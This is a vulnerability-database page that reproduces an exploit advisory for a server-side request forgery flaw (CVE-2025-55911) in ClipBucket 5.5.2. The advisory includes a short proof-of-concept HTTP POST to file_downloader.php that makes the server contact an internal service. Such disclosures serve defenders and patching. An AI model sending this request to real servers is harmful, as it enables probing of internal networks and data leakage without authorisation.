| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2025-55911 | 17 Sep 202521:02 | – | circl | |
| ClipBucket 安全漏洞 | 18 Sep 202500:00 | – | cnnvd | |
| CVE-2025-55911 | 18 Sep 202500:00 | – | cve | |
| CVE-2025-55911 | 18 Sep 202500:00 | – | cvelist | |
| EUVD-2025-29929 | 3 Oct 202520:07 | – | euvd | |
| CVE-2025-55911 | 18 Sep 202515:15 | – | nvd | |
| CVE-2025-55911 | 18 Sep 202515:15 | – | osv | |
| 📄 ClipBucket 5.5.2 Build 90 Server-Side Request Forgery | 3 Nov 202500:00 | – | packetstorm | |
| 📄 ClipBucket 5.5.2 Build 90 Practical Exploitation Tool | 8 Dec 202500:00 | – | packetstorm | |
| PT-2025-38406 | 18 Sep 202500:00 | – | ptsecurity |
# Exploit Title: ClipBucket 5.5.2 Build #90 - Server-Side Request Forgery (SSRF)
# Google Dork: N/A
# Date: 2025-09-11
# Exploit Author: Mukundsinh Solanki (r00td3str0y3r)
# Vendor Homepage: https://clipbucket.com
# Software Link: https://github.com/MacWarrior/clipbucket-v5
# Version: 5.5.2 Build #90
# Tested on: Ubuntu 20.04 LTS, PHP 7.4
# CVE: CVE-2025-55911
## Vulnerability Description:
An authenticated user with regular permissions can exploit a Server-Side
Request Forgery (SSRF) vulnerability via the `file` parameter in
`actions/file_downloader.php`. By supplying a crafted URL, attackers can
force the server to make arbitrary HTTP requests to internal services or
external systems. This can lead to internal network enumeration, data
exfiltration, or pivoting attacks.
## PoC Request:
POST /upload/actions/file_downloader.php HTTP/1.1
Host: victim.com
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=validsession
file=http://127.0.0.1:3306/test.mp4
The server attempts to connect to the internal service (`127.0.0.1:3306`),
demonstrating SSRF.
## Impact:
- Internal service enumeration
- Potential metadata leakage
- Pivoting to internal systems
Regards,
Mukundsinh Solanki
+916355251151Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation